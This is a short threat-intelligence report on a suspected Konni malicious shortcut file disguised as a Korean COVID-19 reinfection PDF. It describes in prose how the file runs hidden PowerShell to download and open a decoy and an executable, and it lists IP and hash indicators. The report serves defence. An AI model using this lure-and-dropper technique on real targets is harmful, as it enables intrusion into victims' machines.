북한 해킹 단체 Konni(코니) 만든것으로 추정이 되는 악성코드-국내코로나19재감염사례현황.pdf.lnk(2024.10.5)
2024-10-11 • Sakai • Malware Presumed to Have Been Created by the North Korean Hacking Group Konni - Domestic COVID-19 Reinfection Case Status.pdf.lnk (2024.10.5) •
A Windows shortcut file is assessed by the author as suspected Konni activity, with the caveat that the attribution is not official. The lure is named as a domestic COVID-19 reinfection status PDF, suggesting possible interest in medical or public-health recipients, and uses an Adobe-style icon to appear document-related. The LNK launches cmd.exe and hidden PowerShell from SysWOW64, changes to C:\Users\Public, downloads a decoy PDF and 1.exe from hxxp://172.22.224.1:7777, then opens both files.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 6.6.4.1 | 2024-10-08 | 2024-10-14 |
| HASH | 02cf6a1a8b6a06eaa92d3f0302a5650… | 2024-10-11 | 2024-10-11 |
| HASH | b9766b61ab05673e2945476d2cf5209… | 2024-10-11 | 2024-10-11 |
| HASH | 1f96ef9c871f24720c7c05055ad99c78 | 2024-10-11 | 2024-10-11 |
Related Actors
Related Reports
Shares tags: Konni, LNK • Same author: Sakai • Published within a month
Shares tags: Konni, LNK • Published within a month
Shares tags: Konni, LNK • Published within a week
2024-07-25 •
80% Match
북한 해킹 단체 Konni(코니) 암호화폐 거래소 빗썸(Bithumb) 정보 업데이트 요청으르로 위장한 악성코드-금융당국 요청에 따른 프로젝트 정보 확인 요청의 건.zip(2024.7.23)
Sakai
Shares tags: Konni, LNK • Same author: Sakai
Shares tags: Konni, LNK • Same author: Sakai
Shares tags: Konni, LNK • Same author: Sakai